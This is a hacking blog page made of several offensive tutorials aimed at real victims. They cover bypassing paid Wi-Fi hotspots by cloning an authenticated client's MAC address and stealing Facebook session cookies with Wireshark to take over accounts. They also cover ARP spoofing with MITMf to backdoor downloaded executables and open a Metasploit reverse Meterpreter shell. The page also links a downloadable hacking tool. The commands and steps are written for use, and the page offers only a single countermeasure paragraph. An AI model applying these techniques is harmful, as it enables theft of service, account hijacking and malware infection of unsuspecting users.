.png)
How To Hack Wi-Fi Hotspots Access
Today we’re gonna take a look at how to hack Wi-Fi hotspots. In the last few years, many commercial hotspots have been poppin’ up literally everywhere. Most of these work as a complement to a ISP’s (Internet Service Provider) subscription. Others work with a pay-to-use model… if you want to use for X amount of hours, you pay $ Y amount of money.
Once the client connects into one of these hotspots he will either have to login using credentials (email & passwd) or input his credit card to purchase time…
Understanding The Protocol
When the client logs in or pays for time on the hotspot, his MAC address is now whitelisted (a list of approved addresses which are free to go thru to the internet, if a MAC address isn’t on that list he will be restricted to the local area network) and therefore allowed to browse the web freely.
What can we do with this information?
Planning The Attack
An attack into this type of network seems fairly easy to accomplish… as always you’ll want to start by bringing up a monitor interface:
airmon-ng start <wireless interface>
Then, begin scanning for associated clients on a specific channel and pay attention to the incoming traffic. You can use the following command to do so:
airodump-ng -c <channel> -a <monitor interface>
Optionally, you could write the traffic into a file (-w <filename>). During the scan pay attention to the OPEN networks you find, see which ones are hotspots (hint: they usually end with the word “wifi”) and most importantly keep an eye out for associated clients.
Cloning The Target
If you’ve found an associated client, looks at the amount of “frames” (read traffic) shown in the scan. More frames = more traffic; continuous frames = continuous traffic = authenticated client. If we clone an unauthenticated client, the method won’t work. So it’s worth making sure we have the right network and right client under the scope.
Once your ready, clone the client using the following command:
ifconfig <wireless interface> hw ether <MAC address>
Alternatively, you can use macchanger as well.
Let’s take a look at the video in high quality!
NWHT – NEW TOOL FOR HACKING WIRELESS
Network Wireless Hacking Tools, new version and support your kali linux
DOWNLOAD LINK :- https://www.dropbox.com/s/kdn4znccu7t4v8r/NWHT.zip
Hijacking Facebook Accounts – Access On Any Facebook Profile
Facebook Authentication Cookies
The cookie which facebook uses to authenticate it’s users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
How To Steal Facebook Session Cookies And Hijack An Account?
An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.
If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.
In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.
Step 1 – First of all download wireshark from the official website and install it.
Step 2 – Next open up wireshark click on analyze and then click on interfaces.
Step 3 – Next choose the appropriate interface and click on start.
Step 4 – Continue sniffing for around 10 minutes.
Step 5 – After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.
Step 6 – Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.
Step 7 – Next right click on it and goto Copy – Bytes – Printable Text only.
Step 8 – Next you’ll want to open up firefox. You’ll need both Greasemonkey and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in.
Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.
Step 10 – Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.
VIDEO TUTORIAL
VIDEO TUTORIAL
Countermeasures
The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won’t be able to do any thing with your cookies.
Exploit Target Without Sending Anything
How It Works
MITMf (if you don’t already know) is a man in the middle attack framwork. MITMf literally stands for “Man In The Middle framework.” It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?
We will be ARP spoofing a Windows 8.1 VM machine in this test.
Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.
Requirements
Step 1: Editing the Configurations
Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.
Scroll down until you get to the FilePwn section.
You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don’t change the port. Just remember the port number for the payload you want to use.
Step 2: Selecting the Target
When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I’m targeting a Windows 8.1 machine, so I would useWindowsIntelx86. The port number for that is 8443. Remember your payload’s port number for later.
Step 3: Set Up a Listener
We’re going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I’m using Meterpreter.
set PAYLOAD windows/meterpreter/reverse_tcp
Set the LHOST and LPORT options…
set LHOST 10.0.2.117
set LPORT 8443 (Make sure you set the corresponding port number!)
set LPORT 8443 (Make sure you set the corresponding port number!)
Then exploit -j. Open up a new terminal…
Step 4: Running the Attack
To run the attack, use the following command:
mitmf –spoof –arp -i <interface> –gateway <gateway IP> –target <target IP> –filepwn
mitmf –spoof –arp -i <interface> –gateway <gateway IP> –target <target IP> –filepwn
For me it would be:
mitmf –spoof –arp -i wlan0 –gateway 10.0.2.1 –target 10.0.2.15 –filepwn
mitmf –spoof –arp -i wlan0 –gateway 10.0.2.1 –target 10.0.2.15 –filepwn
Pretty soon you should be getting output like this:
If a user downloads a file, and the file is patchable. you should get some output saying “File patched successfully. Sending to target.” if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.
If it doesn’t say it’s patched, it can’t be. Unfortunately, this tactic doesn’t work 100% of the time.
Conclusion
Now we know how to run a very neat trick–backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don’t abuse this power. As said in the help menu for MITMf quoting Yoda, “Use wisely, young padawan.”
C|H of C3
TUTORIAL
Vulnerability: The Secrets Behind iCloud Hacking
With the release of iOS9, the iPhone 6S and iPhone 6S Plus. Apple has integrated iCloud into both the PC and Mobile platforms. But what are the risks of uploading all of your personal data online?
Subscribe to:
Posts (Atom)
YASH SAPKALE
The Founder and author of Access Denied. Best with Ethical Hacking and Information Security.
1k + Sales. (Success Story)
Access Denied Cover
Most Trending
-
Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning r... -
Hack Youtube Account Overview So, hacking a youtube account would it be even possible? Security flaws are everywhere especially ... -
Be honest, the page you visit most on Linkedin is the ‘Who’s viewed your profile’ page. It’s ok, it’s the page we all visit most. And I wo...
-
Are you tired of sending useful and funny links to your friends and you’re looking for some wicked prank? Well, the crazy Shove Chrome e...
-
Many of you might have been victims of your email accounts being hacked, or your Facebook password not working. This maybe because your pa...
-
NOTE: Following materials are for EDUCATIONAL PURPOSES ONLY! HaCoder won’t take response for your actions!
-
Smartphone messaging service WhatsApp was acquired by the corporate giant Facebook for over $20 billion last year, and it seems that news...
-
Own an Android phone? Beware, Your Android smartphones can be hacked by just a malformed text message. Security researchers have ... -
As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking... -
Network Wireless Hacking Tools, new version and support your kali linux DOWNLOAD LINK :- https://www.dropbox.com/s/kdn4znccu7t4v8r/...
